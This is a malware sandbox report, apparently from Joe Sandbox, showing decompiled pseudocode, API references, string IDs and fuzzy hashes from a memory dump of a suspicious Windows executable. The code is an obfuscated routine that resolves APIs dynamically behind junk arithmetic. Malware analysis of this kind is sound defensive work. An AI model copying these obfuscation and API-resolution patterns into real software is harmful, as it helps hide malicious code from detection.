                                                          0x0049bd94
                                                          0x0049bdc7
                                                          0x0049bdc7
                                                          0x0049bdcd
                                                          0x00000000
                                                          0x0049bdd7
                                                          0x0049bd96
                                                          0x0049bd9f
                                                          0x0049bda7
                                                          0x0049bda9
                                                          0x0049bdad
                                                          0x0049bdb8
                                                          0x0049bdbd
                                                          0x0049bdc5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0049bdc5

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: B5d$EnumWindowStationsA$SystemPropertiesComputerName.exe$WcnEapAuthProxy.dll$api-ms-win-core-sysinfo-l1-1-0.dll$lprmonui.dll$lyncicon.exe$wlanmsm.dll$Nqt$y!
                                                          • API String ID: 190572456-3128969411
                                                          • Opcode ID: 6dbeb64a5bff84542eee9219351072fca529d01774d8c5fb56b1e9822191abe1
                                                          • Instruction ID: 0ce305c26db08a34d1cbf7c1f458fb2de2b613075d1e872094a0301f41b2ef6b
                                                          • Opcode Fuzzy Hash: 6dbeb64a5bff84542eee9219351072fca529d01774d8c5fb56b1e9822191abe1
                                                          • Instruction Fuzzy Hash: D0919F75A5070A9BCB00DFA8ED949ED7BB1FB38310B44807ED985E7321E7390989D745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0047B8E1 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 227libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 55%
                                                          			E0047B8E1() {
				_Unknown_base(*)()* _t44;
				_Unknown_base(*)()* _t49;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t58;
				_Unknown_base(*)()* _t60;
				_Unknown_base(*)()* _t61;
				char* _t64;
				_Unknown_base(*)()* _t66;
				_Unknown_base(*)()* _t67;
				_Unknown_base(*)()* _t68;
				_Unknown_base(*)()* _t72;
				void* _t73;
				char* _t101;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t134;
				short _t140;
				signed int _t142;
				short _t145;
				signed int _t153;
				signed int _t156;
				short _t157;
				void* _t159;

				 *(_t159 - 8) = _t44;
				L00464E9E(_t73, _t142, _t156, _t73);
				L00464E9E(0, _t142, _t156, 0);
				 *(_t159 - 0x10) =  *(_t159 - 0x10) - _t134 + _t134 - 0x67;
				 *0x50afda =  *0x50afda;
				 *0x5080c0 =  *0x5080c0 + 0x4d7f10;
				_t49 =  *(_t159 - 8);
				 *(_t159 - 0x2c) = _t49;
				 *(_t159 - 8) = _t49;
				 *((intOrPtr*)(_t159 - 0xc)) = 0x4d3fd6;
				_t137 = 0x55ede8;
				 *0x508158 = 0x55ede8;
				_push( *(_t159 - 0x2c));
				_t53 =  *(_t159 - 8);
				if(0x2d6019 < 0x2d6019) {
					L5:
					 *0x50812c = _t137;
					 *(_t159 - 8) = _t53;
					 *0x508150 = _t137;
					L004668D8(0, _t142, _t153, _t156,  *(_t159 - 8), 0,  *(_t159 - 8));
					 *(_t159 - 0x10) = 0x3f441a;
					 *0x508188 =  *0x508188 - 0x6614;
					 *0x5081a2 = _t142;
					_t58 = GetProcAddress( *0x5083db, ??);
					 *0x5081f2 = _t142 ^ 0x00000088;
					_t145 = 0xb1;
					_t90 = 0xc1;
					 *0x50afe3 =  *0x50afe3 - _t58;
					if(_t156 == 0) {
						_t153 = _t153 - 0xd4b368;
						 *0x50af28 =  *0x50af28 - _t153;
						_t90 = "wlanmsm.dll" - _t58;
					}
					 *0x50afdc =  *0x50afdc - _t90 + 0x32ff54;
					 *(_t159 - 0x10) = 0x6614;
					_t140 = 0x700d;
					 *(_t159 - 8) = _t58;
					_t60 =  *(_t159 - 8);
					 *((intOrPtr*)(_t159 - 0xc)) = 0x2cdcf1;
					 *0x5088a7 = _t60;
					_t157 = _t156 + 0xd0c1;
					if(_t153 < 0) {
						if(_t153 < 0) {
							 *((intOrPtr*)(_t159 - 0xc)) =  *(_t159 - 8) - 0x3bfe;
							_t140 = 0x636b;
							 *0x50817e = 0x636b;
							_t145 = _t157;
						}
						_t157 = _t157 + 0xae0557;
						 *0x50afe5 = _t60;
						_t153 = _t153 ^ 0x000000dd;
					}
					 *0x508437 = _t60;
					_push(0);
					 *0x50afd9 =  *0x50afd9 - _t60;
					 *(_t159 - 8) = _t60;
					_t61 =  *(_t159 - 8);
					_push( *0x50812a);
					_t101 =  *0x50afe5; // -1
					 *(_t159 - 8) = _t61;
					if(_t61 <= 0x3067) {
						L16:
						goto L17;
					} else {
						_t101 = "api-ms-win-core-rtlsupport-l1-1-0.dll";
						 *(_t159 - 0x10) = _t101;
						if(_t140 > _t140) {
							L17:
							_t64 = "lyncicon.exe";
							if(_t101 >= 0x33) {
								_t101 = 0x42806f;
								 *(_t159 - 0x10) = 0x42806f;
								_t140 = _t140 - 0x7b;
							}
							 *0x5081c8 = _t145;
							 *0x50afe1 = _t64;
							_t66 =  *(_t159 - 8);
							_push( *0x508044);
							 *0x50afdd =  *0x50afdd - _t140;
							 *(_t159 - 8) = _t66;
							_push(_t66);
							E00465A23();
							 *0x50afdc =  *0x50afdc + 0x3e3dca;
							_t67 =  *(_t159 - 8);
							 *(_t159 - 8) = _t67;
							if(_t67 == 0x28) {
							}
							_t68 =  *(_t159 - 8);
							 *0x5081c0 = 0xa8c3;
							_push( *0x508088);
							 *0x50afd8 = _t68;
							_t106 =  *0x50860b; // 0x0
							 *(_t159 - 8) = _t68;
							 *0x5089f7 = _t106;
							_t108 =  *((intOrPtr*)(_t159 - 0xc));
							_push(1);
							_push(_t108);
							_push(_t108);
							_push(0x47bc53);
							goto __ebx;
						}
						if(_t140 != _t140) {
							 *((intOrPtr*)(_t159 - 0x14)) =  *((intOrPtr*)(_t159 - 0x14)) + _t140;
							 *0x5081a6 = _t145;
						}
						_t145 = _t157;
						_t72 =  *0x50afe5; // -1
						 *0x50afe6 = _t72;
						goto L16;
					}
				}
				_t137 = 0x55ee4b;
				 *0x508178 = 0x55ee4b;
				if(0x55ee4b != 0x55ee4b) {
					 *0x508212 = _t142 - 1;
					_t142 = _t156;
					 *0x50afe3 =  *0x50afe3 - _t53;
					 *0x508341 =  *0x508341 + _t156;
				}
				if(_t53 <= 0) {
					 *0x50afe6 =  *0x50afe6 - _t53;
				}
				goto L5;
			}


























                                                          0x0047b8e8
                                                          0x0047b8f1
                                                          0x0047b8fa
                                                          0x0047b904
                                                          0x0047b90d
                                                          0x0047b913
                                                          0x0047b91a
                                                          0x0047b91d
                                                          0x0047b925
                                                          0x0047b92d
                                                          0x0047b938
                                                          0x0047b93d
                                                          0x0047b94a
                                                          0x0047b957
                                                          0x0047b95c
                                                          0x0047b99c
                                                          0x0047b9b4
                                                          0x0047b9c1
                                                          0x0047b9d5
                                                          0x0047b9e5
                                                          0x0047b9f2
                                                          0x0047b9ff
                                                          0x0047ba06
                                                          0x0047ba13
                                                          0x0047ba19
                                                          0x0047ba22
                                                          0x0047ba25
                                                          0x0047ba27
                                                          0x0047ba2f
                                                          0x0047ba34
                                                          0x0047ba3a
                                                          0x0047ba50
                                                          0x0047ba50
                                                          0x0047ba59
                                                          0x0047ba61
                                                          0x0047ba67
                                                          0x0047ba6b
                                                          0x0047ba75
                                                          0x0047ba78
                                                          0x0047ba7b
                                                          0x0047ba86
                                                          0x0047ba8e
                                                          0x0047ba92
                                                          0x0047baae
                                                          0x0047bab6
                                                          0x0047baba
                                                          0x0047bacf
                                                          0x0047bad2
                                                          0x0047bad4
                                                          0x0047bada
                                                          0x0047bae0
                                                          0x0047baec
                                                          0x0047baf2
                                                          0x0047bb08
                                                          0x0047bb0a
                                                          0x0047bb10
                                                          0x0047bb19
                                                          0x0047bb21
                                                          0x0047bb28
                                                          0x0047bb34
                                                          0x0047bb3b
                                                          0x0047bb71
                                                          0x00000000
                                                          0x0047bb3d
                                                          0x0047bb40
                                                          0x0047bb45
                                                          0x0047bb4b
                                                          0x0047bb75
                                                          0x0047bb75
                                                          0x0047bb7d
                                                          0x0047bb85
                                                          0x0047bb8a
                                                          0x0047bb93
                                                          0x0047bb93
                                                          0x0047bb96
                                                          0x0047bba4
                                                          0x0047bbb2
                                                          0x0047bbb5
                                                          0x0047bbbc
                                                          0x0047bbc2
                                                          0x0047bbc5
                                                          0x0047bbc6
                                                          0x0047bbd6
                                                          0x0047bbdc
                                                          0x0047bbdf
                                                          0x0047bbe4
                                                          0x0047bbe4
                                                          0x0047bbfb
                                                          0x0047bbfe
                                                          0x0047bc0b
                                                          0x0047bc1f
                                                          0x0047bc26
                                                          0x0047bc2c
                                                          0x0047bc2f
                                                          0x0047bc3b
                                                          0x0047bc43
                                                          0x0047bc45
                                                          0x0047bc46
                                                          0x0047bc47
                                                          0x0047bc51
                                                          0x0047bc51
                                                          0x0047bb4f
                                                          0x0047bb51
                                                          0x0047bb54
                                                          0x0047bb54
                                                          0x0047bb5f
                                                          0x0047bb66
                                                          0x0047bb6c
                                                          0x00000000
                                                          0x0047bb6c
                                                          0x0047bb3b
                                                          0x0047b961
                                                          0x0047b964
                                                          0x0047b96e
                                                          0x0047b971
                                                          0x0047b978
                                                          0x0047b981
                                                          0x0047b987
                                                          0x0047b990
                                                          0x0047b994
                                                          0x0047b996
                                                          0x0047b996
                                                          0x00000000

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0047BA13
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: WcnEapAuthProxy.dll$api-ms-win-core-rtlsupport-l1-1-0.dll$credssp.dll$diskperf.exe$lyncicon.exe$wlanmsm.dll$wmi.dll$xmllite.dll$Nqt$U
                                                          • API String ID: 190572456-3303468885
                                                          • Opcode ID: a7914e15a3f12317fcde8e5cdfe82bea0286fb6708fbc60e86f4873224eb7090
                                                          • Instruction ID: c76e24b61a264235fe33c65509d8e77367c64379c17ed8c40d4b391394877020
                                                          • Opcode Fuzzy Hash: a7914e15a3f12317fcde8e5cdfe82bea0286fb6708fbc60e86f4873224eb7090
                                                          • Instruction Fuzzy Hash: 9991BEB9A043469FCB01DFB9ECD4ADD7BB0FB38310F04806AD984A7352E2740A49DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00470064 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 219libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 0047018A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: ?{2$GetAccessPermissionsForObjectW$GetTickCount64$LookupPrivilegeValueA$SystemPropertiesComputerName.exe$api-ms-win-core-rtlsupport-l1-1-0.dll$credssp.dll$nshhttp.dll$xmllite.dll$Nqt
                                                          • API String ID: 190572456-3870129988
                                                          • Opcode ID: 2cab30468f7d760a0d0d278bde01168fc02f73c95343c1b18c22e352529df40f
                                                          • Instruction ID: a295487b95ef686a5edab79f77895e81132f6d1df3f40bcc32b5779569e5087f
                                                          • Opcode Fuzzy Hash: 2cab30468f7d760a0d0d278bde01168fc02f73c95343c1b18c22e352529df40f
                                                          • Instruction Fuzzy Hash: C581A175A50706DBCB00DFB8E894AED7BB1FB39310F44807AD989E7352E6390589EB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00495915 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 206libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 45%
                                                          			E00495915(signed int __eax, signed int __edx, signed int __edi, void* __esi) {
				signed int _t42;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				_Unknown_base(*)()* _t51;
				signed int _t58;
				intOrPtr _t68;
				void* _t75;
				char* _t84;
				char* _t92;
				signed int _t110;
				signed int _t111;
				short _t112;
				intOrPtr _t114;
				intOrPtr _t118;
				short _t121;
				void* _t129;
				intOrPtr _t132;
				signed int _t134;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				void* _t143;

				_t139 = __esi;
				_t134 = __edi;
				 *0x508170 =  *((intOrPtr*)(_t143 - 0x10));
				 *(_t143 - 8) = __eax;
				 *0x508af3 =  *((intOrPtr*)(_t143 - 0x10));
				 *((intOrPtr*)(_t143 - 0x10)) = 0x480795;
				_t42 =  *(_t143 - 8);
				 *(_t143 - 0x2c) = _t42;
				 *((intOrPtr*)(_t143 - 0x14)) =  *((intOrPtr*)(_t143 - 0x14)) + 0xffffffffffff9027;
				_t110 = __edx;
				_t121 =  *0x5081c6; // 0x64
				 *0x508210 = _t121;
				_t75 = 0x480795 - _t42;
				 *(_t143 - 8) = _t42;
				_t44 =  *(_t143 - 8);
				if(_t75 <= 0x32dd) {
					if(_t75 <= _t75) {
					}
					 *((intOrPtr*)(_t143 - 0x10)) =  *((intOrPtr*)(_t143 - 0x10)) - _t110;
					_t110 = 0x79d2;
				}
				 *0x50afdf =  *0x50afdf - _t121 + 1;
				_push( *(_t143 - 0x2c));
				_t136 = (_t134 ^ 0x0000e15d) + 1;
				if(_t44 < 0xd) {
					 *(_t143 - 0xc) = "RtlEthernetStringToAddressW";
					E0050814C = _t110;
					_t110 = _t110 + _t110 + 0x7be9;
					 *0x50993f =  *0x50993f - 0x8bae;
					_t139 = _t139 + _t136;
					 *0x50afe6 = _t44;
					_t136 = _t136 + 0x0000e269 ^ 0x0006005a;
				}
				 *(_t143 - 8) = _t44;
				if(_t44 < 0x263a) {
					_t118 =  *0x508150; // 0xeb66
					_t110 = _t118 - 1;
				}
				_t45 =  *(_t143 - 8);
				_t111 = _t110 & 0x000084d7;
				_t126 = 0x9c7f;
				_push( *0x508457);
				 *0x50870b =  *0x50870b - _t136;
				 *(_t143 - 8) = _t45;
				_t46 =  !_t45;
				if(0xf0 - _t45 == 0x31) {
					 *((intOrPtr*)(_t143 - 0x10)) =  *((intOrPtr*)(_t143 - 0x10)) - _t111;
					_t111 = _t111 - 0x63cd75;
					if(_t111 >= _t111) {
						_t126 = 0x9cff;
					}
					if((_t126 & 0x00008ed1) >= 0) {
						_t126 =  *0x50820c; // 0x96b5
						if((_t126 & 0x000000a9) >= 0) {
							 *0x50afe1 = _t46;
						}
						_t68 =  *0x50afe3; // -68
						 *0x50afe5 = _t68;
						_t136 = 0;
						goto L15;
					}
				}
				_t112 = _t111 - 0x608e;
				 *0x508192 = _t112;
				 *0x50822c = _t126 - 0x8768;
				_t51 = GetProcAddress(??, ??);
				_t129 = 0;
				 *(_t143 - 8) = _t51;
				E0046776D(_t136, _t139, 0, _t51);
				_t84 =  &(( *(_t143 - 0xc))[0x431b]);
				 *0x50afdc =  *0x50afdc + _t84;
				if(_t84 < _t84) {
					L19:
					 *0x508547 = 5;
				} else {
					_t112 = 0x6a87;
					 *0x508196 = 0x6a87;
					_t132 =  *0x5081e4; // 0x5a9a
					_t129 = _t132 - 0x99d5;
					if(_t139 == 0 || _t139 > 0) {
						goto L19;
					}
				}
				 *0x50afda =  *0x50afda + 0xa;
				_t58 =  *(_t143 - 8);
				 *0x509237 = _t58;
				_t140 = _t139 - 1;
				 *0x50afe5 =  *0x50afe5 - _t58;
				 *0x50ab50 =  *0x50ab50 + _t136;
				_t137 = _t136 + _t136;
				if(_t58 > 0) {
					 *0x508593 = _t58;
				}
				 *(_t143 - 8) = _t58;
				 *0x50afdd =  *0x50afdd + _t112;
				_t114 =  *0x508170; // 0x2575
				L004668D8(_t114, _t129, _t137, _t140, 0x50, 1, 0);
				_push(1);
				_push(0);
				_push(0x50);
				E00467687();
				if(0x50 >= 0x50) {
					 *0x508172 =  *0x508172 + 0x67de;
					_t114 = 0;
					 *0x50822a = 0;
				}
				_push(0);
				_t92 = "WindowsCodecs.dll";
				_push(_t92);
				_push(_t92);
				_push(0x495c0a);
				_push(L0046426A);
				return 0x205334;
			}



























                                                          0x00495915
                                                          0x00495915
                                                          0x0049591b
                                                          0x00495924
                                                          0x00495929
                                                          0x00495937
                                                          0x0049593d
                                                          0x00495945
                                                          0x00495948
                                                          0x0049594b
                                                          0x0049594e
                                                          0x00495955
                                                          0x0049595c
                                                          0x0049595e
                                                          0x00495966
                                                          0x0049596e
                                                          0x00495974
                                                          0x00495974
                                                          0x0049597b
                                                          0x00495981
                                                          0x00495981
                                                          0x00495986
                                                          0x00495994
                                                          0x0049599f
                                                          0x004959a2
                                                          0x004959ac
                                                          0x004959b6
                                                          0x004959bf
                                                          0x004959c8
                                                          0x004959d8
                                                          0x004959df
                                                          0x004959e4
                                                          0x004959e4
                                                          0x004959f0
                                                          0x004959f7
                                                          0x00495a08
                                                          0x00495a0f
                                                          0x00495a0f
                                                          0x00495a10
                                                          0x00495a13
                                                          0x00495a20
                                                          0x00495a24
                                                          0x00495a2c
                                                          0x00495a36
                                                          0x00495a39
                                                          0x00495a3e
                                                          0x00495a48
                                                          0x00495a4e
                                                          0x00495a57
                                                          0x00495a59
                                                          0x00495a59
                                                          0x00495a64
                                                          0x00495a66
                                                          0x00495a70
                                                          0x00495a72
                                                          0x00495a72
                                                          0x00495a7e
                                                          0x00495a84
                                                          0x00495a89
                                                          0x00000000
                                                          0x00495a92
                                                          0x00495a64
                                                          0x00495aa6
                                                          0x00495aab
                                                          0x00495aba
                                                          0x00495ace
                                                          0x00495ad4
                                                          0x00495ad9
                                                          0x00495adf
                                                          0x00495ae7
                                                          0x00495aec
                                                          0x00495af4
                                                          0x00495b25
                                                          0x00495b31
                                                          0x00495af9
                                                          0x00495af9
                                                          0x00495afd
                                                          0x00495b07
                                                          0x00495b0e
                                                          0x00495b1e
                                                          0x00000000
                                                          0x00000000
                                                          0x00495b1e
                                                          0x00495b39
                                                          0x00495b44
                                                          0x00495b47
                                                          0x00495b4c
                                                          0x00495b4d
                                                          0x00495b53
                                                          0x00495b59
                                                          0x00495b64
                                                          0x00495b66
                                                          0x00495b6b
                                                          0x00495b70
                                                          0x00495b7d
                                                          0x00495b89
                                                          0x00495b9b
                                                          0x00495ba0
                                                          0x00495ba2
                                                          0x00495ba4
                                                          0x00495ba5
                                                          0x00495bad
                                                          0x00495bb6
                                                          0x00495bbd
                                                          0x00495bc8
                                                          0x00495bc8
                                                          0x00495be8
                                                          0x00495bf6
                                                          0x00495bfd
                                                          0x00495bfe
                                                          0x00495bff
                                                          0x00495c04
                                                          0x00495c09

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00495ACE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: 4S $BuildExplicitAccessWithNameA$C+,$GetTickCount64$RtlEthernetStringToAddressW$WcnEapAuthProxy.dll$WindowsCodecs.dll$api-ms-win-core-sysinfo-l1-1-0.dll$xmllite.dll$Nqt
                                                          • API String ID: 190572456-1721917306
                                                          • Opcode ID: 574b6e9e3f0501391cabb72aa6967f10c8de5cd9f0a7ca218b20262ce62a97dd
                                                          • Instruction ID: 563760110c660385b03fcf752b6954c532313b4f910b973045bab0a02d9dd57a
                                                          • Opcode Fuzzy Hash: 574b6e9e3f0501391cabb72aa6967f10c8de5cd9f0a7ca218b20262ce62a97dd
                                                          • Instruction Fuzzy Hash: E3710FB8A047469FCB00EFB5E894ADE7FB1EF39310F04406AD981AB352E6740909DB19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0046C7EE Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 196libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 26%
                                                          			E0046C7EE(void* __ebx, signed int __edx, signed int __edi, short __esi) {
				_Unknown_base(*)()* _t40;
				_Unknown_base(*)()* _t44;
				char* _t51;
				_Unknown_base(*)()* _t52;
				char* _t64;
				short _t101;
				void* _t102;
				unsigned short _t106;
				signed char _t107;
				short _t114;
				signed int _t119;
				unsigned short _t121;
				short _t126;
				signed int _t127;
				void* _t129;

				_t126 = __esi;
				_t119 = __edi;
				_t113 = __edx;
				if((__edx & 0x00008218) == 0) {
					_t113 =  !__edx;
					 *0x5081fc = _t113;
				}
				if(_t126 >= 0) {
					_t126 = _t126 + _t126;
					 *0x50afe6 =  *0x50afe6 + 0x188;
					_t119 = (_t119 | 0x000000ec) & 0x0000f85c;
					E0050892F = E0050892F + "Microsoft.Office.Tools.Outlook.v9.0.ni.dll";
				}
				 *0x50afdd =  *0x50afdd + 0x441df2;
				_push( *0x5083db);
				_t64 = "api-ms-win-core-rtlsupport-l1-1-0.dll";
				_t101 = 0xffffffffffff9944;
				if(_t64 > 0x32a6a8) {
					if(_t64 != _t64) {
						_t64 =  &(_t64[0x47dd6e]);
					}
					 *0x508158 = _t101;
					_t101 = 0;
				}
				_t102 = _t101 + 0x7f6f;
				 *0x50977f =  *0x50977f - _t113;
				 *0x5081dc = _t113;
				_t40 = GetProcAddress(??, ??);
				 *0x50afe1 = _t40;
				if(_t126 == 0) {
					 *0x50aac0 =  *0x50aac0 - _t126;
					 *0x50afe5 = _t40;
					_t64 = 0xfb;
					 *0x508008 =  *0x508008 - _t40;
				}
				if("WindowsCodecs.dll" >= 0x3b) {
					_t102 = 0;
					_t113 = _t113 + 0x8968;
					 *0x50afdf =  *0x50afdf + _t113;
				}
				_t114 = _t126;
				_t127 = _t113;
				 *(_t129 - 8) = _t40;
				_t44 =  *(_t129 - 8);
				 *0x50959b = _t44;
				 *0x50afe1 =  *0x50afe1 - _t44;
				if(_t44 != 0) {
					L15:
					 *0x50afda =  *0x50afda + 0x3133a0;
					 *(_t129 - 0x10) = 0x3133a0;
					_t102 = (0x6e0c >> 0x6e0c) - _t114;
					_t114 = _t114 + _t114 + 0x98;
					 *0x508224 = _t114;
				} else {
					if(_t119 == 0) {
						 *0x50802e =  *0x50802e + _t44;
						 *0x50afd9 =  *0x50afd9;
						goto L15;
					}
				}
				_t121 = 0xffffffffffff0bea;
				_push(0);
				 *(_t129 - 8) = _t44;
				 *(_t129 - 0x10) = "nshhttp.dll";
				_t106 = _t102 + _t102;
				 *((intOrPtr*)(_t129 - 0xc)) = 0x2cf0fc;
				L004668D8(_t106, _t114, 0xffffffffffff0bea, _t127, 0x59e1f8, 1, 0);
				_t107 = _t106 >> _t106;
				_t51 = "wmi.dll";
				if(0x504c47 <= 0x3b09) {
					L19:
					 *0x5081cc = _t114;
					_t114 = 0xa96b;
					 *0x50afe1 = _t51;
					_t51 = 0xd4;
					if((_t121 & _t127) == 0) {
						_t121 = _t121 >> _t107;
						goto L21;
					}
				} else {
					if(0x504c47 <= 0x504c47) {
						L21:
						_t121 = _t121 + 0x4632d;
					} else {
						 *0x508128 = _t107;
						_t107 = 0x723a;
						goto L19;
					}
				}
				_t52 =  *(_t129 - 8);
				_push( *0x508088);
				if(_t107 >= _t107) {
					 *0x5081d0 = _t114;
				}
				 *0x50afe1 = _t52;
				 *0x50afe6 = _t52;
				_push( *0x508088);
				 *0x50848f = _t52;
				 *(_t129 - 8) = _t52;
				_push(_t52);
				_push(_t52);
				_push(E0046CAB8);
				_push(E0046776D);
				return _t52;
			}


















                                                          0x0046c7ee
                                                          0x0046c7ee
                                                          0x0046c7ee
                                                          0x0046c7fa
                                                          0x0046c7fc
                                                          0x0046c7fe
                                                          0x0046c7fe
                                                          0x0046c80f
                                                          0x0046c811
                                                          0x0046c81c
                                                          0x0046c822
                                                          0x0046c832
                                                          0x0046c832
                                                          0x0046c842
                                                          0x0046c85c
                                                          0x0046c879
                                                          0x0046c882
                                                          0x0046c898
                                                          0x0046c89c
                                                          0x0046c89e
                                                          0x0046c89e
                                                          0x0046c8a4
                                                          0x0046c8ab
                                                          0x0046c8ab
                                                          0x0046c8ad
                                                          0x0046c8b2
                                                          0x0046c8b8
                                                          0x0046c8bf
                                                          0x0046c8c5
                                                          0x0046c8ce
                                                          0x0046c8d2
                                                          0x0046c8d8
                                                          0x0046c8df
                                                          0x0046c8e1
                                                          0x0046c8e1
                                                          0x0046c8f8
                                                          0x0046c909
                                                          0x0046c90b
                                                          0x0046c910
                                                          0x0046c910
                                                          0x0046c919
                                                          0x0046c919
                                                          0x0046c91b
                                                          0x0046c928
                                                          0x0046c92b
                                                          0x0046c930
                                                          0x0046c938
                                                          0x0046c956
                                                          0x0046c95e
                                                          0x0046c964
                                                          0x0046c977
                                                          0x0046c97c
                                                          0x0046c97f
                                                          0x0046c93a
                                                          0x0046c93e
                                                          0x0046c946
                                                          0x0046c94d
                                                          0x00000000
                                                          0x0046c953
                                                          0x0046c93e
                                                          0x0046c998
                                                          0x0046c99d
                                                          0x0046c99f
                                                          0x0046c9b2
                                                          0x0046c9b5
                                                          0x0046c9c4
                                                          0x0046c9ce
                                                          0x0046c9db
                                                          0x0046c9e4
                                                          0x0046c9f0
                                                          0x0046ca06
                                                          0x0046ca06
                                                          0x0046ca16
                                                          0x0046ca1a
                                                          0x0046ca24
                                                          0x0046ca28
                                                          0x0046ca2a
                                                          0x00000000
                                                          0x0046ca2a
                                                          0x0046c9f2
                                                          0x0046c9f6
                                                          0x0046ca2d
                                                          0x0046ca2f
                                                          0x0046c9f8
                                                          0x0046c9f8
                                                          0x0046ca02
                                                          0x00000000
                                                          0x0046ca02
                                                          0x0046c9f6
                                                          0x0046ca39
                                                          0x0046ca3c
                                                          0x0046ca45
                                                          0x0046ca4f
                                                          0x0046ca59
                                                          0x0046ca62
                                                          0x0046ca71
                                                          0x0046ca87
                                                          0x0046ca98
                                                          0x0046caa8
                                                          0x0046caab
                                                          0x0046caac
                                                          0x0046caad
                                                          0x0046cab2
                                                          0x0046cab7

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: Microsoft.Office.Tools.Outlook.v9.0.ni.dll$M6$System.Web.DynamicData.dll$WindowsCodecs.dll$api-ms-win-core-rtlsupport-l1-1-0.dll$nshhttp.dll$pYqt$pYqt$wmi.dll$Nqt
                                                          • API String ID: 190572456-2047549566
                                                          • Opcode ID: 6cd8d8952440b883448f5414f09d1045ee7fb2fb21663ab4f17c290dcf054d1c
                                                          • Instruction ID: 9c18c483867493fffe04861d5b726bac731bb9b74bd01f732072e74015f29e7b
                                                          • Opcode Fuzzy Hash: 6cd8d8952440b883448f5414f09d1045ee7fb2fb21663ab4f17c290dcf054d1c
                                                          • Instruction Fuzzy Hash: AF61DFB9B543468FCB01DF78EC94BED3BB1EB39310F08416A9884D7352E6740849DB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004B196F Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E004B196F(void* __eax, void* __ebx, void* __edx, signed short __edi, signed short __esi, void* __eflags) {
				signed char _t68;
				signed char _t72;
				signed char _t76;
				signed char _t88;
				signed char _t89;
				signed char _t91;
				intOrPtr _t94;
				intOrPtr _t98;
				intOrPtr _t105;
				char* _t112;
				signed char _t119;
				signed int _t161;
				signed short _t170;
				signed short _t171;
				signed short _t173;
				void* _t174;

				_t173 = __esi;
				_t170 = __edi;
				L00466DA9(__ebx, __edi, __esi, 0x85d2, 0x85d2);
				_t94 =  *0x50afe3; // -68
				 *(_t174 - 8) = _t174 - 0x46c;
				L00464E9E(_t94, 0xffffffffffffe076, __esi, 0);
				 *((intOrPtr*)(_t174 - 0x18)) = _t94;
				if("BuildExplicitAccessWithNameA" <= 0x2b) {
					 *0x5080f2 =  *0x5080f2 - 0x3b3107;
					 *0x5081ac = 0xffffffffffffe100;
				}
				_t98 =  *((intOrPtr*)(_t174 - 0x10));
				 *((intOrPtr*)(_t174 - 0x14)) = _t98;
				_t68 =  *(_t174 - 8);
				 *(_t174 - 0x474) = _t68;
				 *0x508220 = 0x9bdc;
				_t161 = 0x00009bdc & _t173;
				 *(_t174 - 8) = _t68;
				 *((intOrPtr*)(_t174 - 0x14)) = _t98;
				_t72 =  *(_t174 - 8);
				 *(_t174 - 8) = _t72;
				 *(_t174 - 0xc) = _t72;
				_t76 =  *(_t174 - 8);
				 *((intOrPtr*)(_t174 - 0x18)) = 0x2b997c;
				 *((intOrPtr*)(_t174 - 0x18)) = 0x2b997c;
				_push( *(_t174 - 0x474));
				 *0x50afe1 = _t76;
				_t105 = 0xd3;
				 *(_t174 - 8) = _t76;
				if(_t76 < 0x113031) {
					 *(_t174 - 0x1c) = "SystemPropertiesComputerName.exe";
					_t105 =  *(_t174 - 0x20) - 0x5a1f;
					if((_t161 & 0x007b4212) >= 0) {
					}
					_t76 = 0xbc;
					 *0x50afe3 =  *0x50afe3 - 0xbc;
					_t173 = 0;
				}
